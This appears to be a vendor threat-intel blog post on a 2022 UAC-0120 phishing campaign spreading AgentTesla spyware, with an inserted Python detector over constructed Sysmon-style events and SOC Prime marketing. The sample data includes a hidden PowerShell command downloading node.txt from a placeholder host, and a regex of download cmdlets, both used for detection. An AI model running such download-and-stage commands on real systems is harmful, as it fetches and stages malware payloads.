AgentTesla Mass Distribution

On August 30 and 31, 2022, CERT-UA revealed a burst of adversary activity massively distributing phishing emails among Ukrainian, Austrian, and German organizations. According to the corresponding CERT-UA#5252 alert, hackers exploit the email attachment vector spreading the notorious AgentTesla info-stealing malware. The malicious activity can be attributed to the behavior patterns of the hacking collective tracked as UAC-0120.

AgentTesla Malware Distribution: Analysis of the Latest Email Campaigns by UAC-0120 

Since the world entered the global cyber war when russia launched its major invasion of Ukraine, russia-linked hacking collectives escalated their malicious activity by launching cyberespionage campaigns and destructive cyber-attacks. As part of those campaigns, adversaries leveraged info-stealing malware samples, like the IcedID Trojan and AgentTesla spyware. The latter is one of the widely used spyware Trojans designed to steal sensitive data from compromised users. AgentTesla malware emerged in earlier cyber-attacks against Ukraine attributed to the malicious activity of the UAC-0041 hacking group.

On August 31, 2022, CERT-UA issued the alert CERT-UA#5252 warning the global cyber defender community of a new wave of cyber-attacks by the UAC-0120 hacking group massively spreading AgentTesla spyware. Adversaries launch ongoing phishing email campaigns targeting organizations across Ukraine, Austria, and Germany. These emails contain malicious IMG attachments named “Technisches Zeichnen” (“Technical Drawing”) used as phishing lures to trick victims into opening them and spreading the infection. The IMG lure contains a CHM file, which, if opened, executes malicious JavaScript code. The latter downloads and launches the node.txt file via a PowerShell script.

As a result, the PowerShell code executes DLL and EXE files, the latter being the AgentTesla spyware that infects the compromised systems. According to the CERT-UA research, similar phishing emails were delivered on August 11, but they used other lures for email subjects and attachments.
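The following is an added detection example, not code from CERT-UA or SOC Prime: it runs a small classifier over constructed Sysmon-style process-creation events to flag the chain described above. It assumes the CHM is opened by hh.exe (the Windows HTML Help host) and flags hh.exe spawning PowerShell as well as a PowerShell command line that downloads a .txt payload such as node.txt; the events, paths and URL are constructed samples.

```python
import re

# Constructed sample events (not real telemetry): parent image, image, command line.
EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\hh.exe",
     "cmd": r'"C:\Windows\hh.exe" "D:\Technisches Zeichnen.chm"'},
    {"parent": r"C:\Windows\hh.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell -w hidden -c Invoke-WebRequest http://example.invalid/node.txt "
            r"-OutFile C:\Users\Public\node.txt"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell -File C:\scripts\backup.ps1"},
]

# PowerShell download cmdlets/aliases followed somewhere later by a .txt target.
DOWNLOAD_TXT = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|iwr|curl|wget)\b.*\.txt", re.I)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.lower().rsplit("\\", 1)[-1]


def classify(event):
    """Return the list of detection names that match one process-creation event."""
    hits = []
    parent, image = basename(event["parent"]), basename(event["image"])
    is_ps = image in ("powershell.exe", "pwsh.exe")
    # A help file viewer should not be launching PowerShell (assumed CHM host: hh.exe).
    if parent == "hh.exe" and is_ps:
        hits.append("chm_spawns_powershell")
    # Script payloads staged as .txt, as with node.txt in this campaign.
    if is_ps and DOWNLOAD_TXT.search(event["cmd"]):
        hits.append("powershell_downloads_txt_payload")
    return hits


def scan(events):
    """Return (index, hits) for every event that triggers at least one detection."""
    results = []
    for i, event in enumerate(events):
        hits = classify(event)
        if hits:
            results.append((i, hits))
    return results


if __name__ == "__main__":
    for index, hits in scan(EVENTS):
        print(index, EVENTS[index]["cmd"], "->", ", ".join(hits))
```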

Detecting the UAC-0120 Activity: Sigma Rules to Proactively Defend Against Phishing Attacks Spreading AgentTesla

To proactively defend against the emerging adversary activity of diverse hacking collectives spreading info-stealing malware, cybersecurity researchers are looking for ways to boost threat detection capabilities and accelerate threat hunting velocity. The SOC Prime Team curates a set of unique Sigma rules to detect the malicious activity of the UAC-0120 group, which is behind ongoing cyber-attacks distributing AgentTesla spyware. Since these phishing campaigns target multiple organizations from Ukraine, Austria, and Germany, cyber defenders should stay on alert to timely identify the infection in their organization’s infrastructure and mitigate the potential threat. 

Cybersecurity practitioners can browse SOC Prime for the related threats based on the group identifier “UAC-0120” and instantly gain access to relevant Sigma rules enriched with insightful contextual metadata, like MITRE ATT&CK® and CTI references:

Sigma rules to detect the malicious activity of the UAC-0120 group massively distributing AgentTesla malware

All Sigma rules are available in SOC Prime’s Detection as Code platform and can be applied across supported industry-leading SIEM, EDR, and XDR technologies. 

Instantly access context-enriched Sigma rules for AgentTesla malware detection directly from SOC Prime’s Cyber Threats Search Engine. Click the Explore Detections button and drill down to the relevant detection content accompanied by comprehensive contextual information for in-depth threat investigation. Need more than just detection rules? Gain from Detection as Code available on demand offering utmost flexibility with a pre-paid balance.

All dedicated Sigma rules are aligned with the MITRE ATT&CK® framework addressing the following adversary tactics and techniques enabling cybersecurity professionals to instantly gain insights into the MITRE ATT&CK context behind the ongoing email campaigns of the UAC-0120 group:

Stay ahead of emerging threats with on-demand access to the latest and most relevant Detection-as-Code content available in SOC Prime’s platform. Choose the On-Demand subscription plan and save up to 2,200 hours on threat research and detection content development while maximizing the value of your SOC team resources. 
